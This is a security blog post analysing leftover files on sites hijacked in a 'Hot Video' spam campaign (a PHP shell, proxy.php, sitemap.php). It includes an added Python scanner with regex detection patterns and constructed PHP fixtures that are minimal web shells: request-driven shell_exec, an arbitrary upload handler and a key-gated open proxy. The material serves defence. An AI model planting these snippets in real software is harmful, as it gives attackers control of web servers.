By: Julien Sobrier

"Hot Video" Pages: Analysis Of A Hijacked Site (Part IV)


In Parts I and II, I analyzed files on a hijacked web site that was part of the malicious "Hot Video" campaign. While doing the analysis, I looked at other hijacked domains. All these domains had one of the malicious files described in Part II, which allows anyone to execute commands or upload files. Some of these files are variations of the "Hot Video" pages; others are unrelated to the attack.

Here are some of the more interesting scripts I found.

PHP Shell

Using PHP or shell commands through HTTP requests might still be too much work for some people! More than a few hijacked sites had a PHP shell script installed, which makes it easier to connect to the database, see the source code of any script, upload or modify files, etc.

Powerful PHP shell

Because the file name of this PHP shell is always the same, it is even easier to find such hijacked sites with a single Google query.

proxy.php

As its name suggests, this script acts as a proxy. It might be used by spam sites to access Google Hot Trends without being detected and blacklisted. This script can only be used by people who know a special "key" which cannot be directly derived from the source code, as with the .sys.php file analyzed earlier.

PHP code of proxy.php

sitemap.php

All the hijacked sites contain a Sitemap, a file which shows the list of spam pages on the same domain and other domains. They are usually created by the same script which shows the "Hot Video" page (see Part III). But on a few sites, there is a separate sitemap.php file to create this list.

The script uses the list of keywords from key.txt and the list of sites from sites.txt to generate a list of spam pages.

PHP code of sitemap.php

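The files described in the sections above share a few source-level traits: a request parameter flowing straight into a command-execution function, an upload handler dropped into an unexpected directory, and a server-side fetch of a URL taken from the request, sitting behind a key check. The following Python script is an added example, not code from the original post or from Zscaler, that scans a web root for those traits so a site owner can find the leftovers the post describes. The fixture files and their paths are constructed; the assumption that proxy.php protects its key by comparing a hash of the supplied value is mine, not something the post states. The sitemap.php fixture is there to show what a pattern scan does not catch: a file that only reads key.txt and sites.txt and prints links contains no dangerous call, so it needs a baseline or file-integrity comparison instead.

```python
"""Indicator scan for PHP files left behind on a hijacked web root.

Constructed example, not the post author's tooling. It looks for the traits
the post describes (request-driven command execution, upload handlers,
request-driven remote fetches behind a key check) with simple regexes.
Regexes are a triage aid, not proof of compromise: review every hit.
"""
import os
import re
import tempfile
from typing import Dict, List

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"

# Each indicator: name -> compiled pattern applied to the raw PHP source.
INDICATORS = {
    # A request parameter passed into a command-execution function: the
    # trait of the backdoor files from Part II.
    "request_to_exec": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\([^;]*" + SUPERGLOBAL
    ),
    # eval() over an obfuscated payload, typical of dropped PHP shells.
    "eval_of_decoded_payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    ),
    # An upload handler; suspicious outside a known upload endpoint.
    "upload_handler": re.compile(r"\bmove_uploaded_file\s*\("),
    # A URL taken from the request and fetched server-side (proxy behaviour).
    "request_driven_fetch": re.compile(
        r"\b(?:file_get_contents|fopen|curl_setopt)\s*\([^;]*" + SUPERGLOBAL
    ),
    # A request parameter checked through a hash, so the key is not readable
    # from the source. Assumption: one way the proxy.php gate could work.
    "hashed_key_gate": re.compile(r"\b(?:md5|sha1)\s*\(\s*" + SUPERGLOBAL),
}


def scan_php_source(src: str) -> List[str]:
    """Return the names of the indicators present in one PHP source text."""
    return [name for name, pat in INDICATORS.items() if pat.search(src)]


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a web root; map each flagged PHP file (relative path) to its indicators."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip, do not abort the whole scan
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


# Constructed fixtures standing in for files on a hijacked site. The paths
# are illustrative; only proxy.php, sitemap.php and .sys.php are names the
# post mentions. PLACEHOLDER_HASH is a placeholder, not a real value.
FIXTURES = {
    "index.php": "<?php echo 'Welcome to my site'; ?>",
    "wp-content/uploads/proxy.php": (
        "<?php\n"
        "if (md5($_GET['key']) !== 'PLACEHOLDER_HASH') { exit; }\n"
        "echo file_get_contents($_GET['u']);\n"
    ),
    "images/.sys.php": "<?php echo shell_exec($_REQUEST['c']); ?>",
    "images/up.php": "<?php move_uploaded_file($_FILES['f']['tmp_name'], $_POST['d']); ?>",
    # No dangerous call here: a pattern scan will not flag this file.
    "sitemap.php": (
        "<?php\n"
        "$keys = file('key.txt'); $sites = file('sites.txt');\n"
        "foreach ($keys as $k) foreach ($sites as $s) echo trim($s) . '/' . urlencode(trim($k)) . \"\\n\";\n"
    ),
}


def demo() -> Dict[str, List[str]]:
    """Write the fixtures into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, src in FIXTURES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(src)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, found in sorted(demo().items()):
        print(f"{rel}: {', '.join(found)}")
```

Run it against a copy of the web root (replace the temporary directory in demo() with the real path) and treat every hit as a lead to read by hand. Because sitemap.php produces no hit, the scan is best paired with a comparison of the live tree against a known-good copy or the CMS package, which also catches files that merely differ from what the owner deployed.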
Script kiddies?

There shouldn't be too much pride in hacking a site which is already hacked. But some groups claimed to have "owned" a few sites which they did not hack in the first place.

Hacker group claims to have "owned" a site that was already hacked

Conclusion

The scariest part of this analysis is that these websites remain vulnerable months after being hijacked. Maybe their owners don't care about these sites, but they can be used to infect users at any time. Anybody who knows the right Google query can control hundreds of websites within a few minutes.

-- Julien
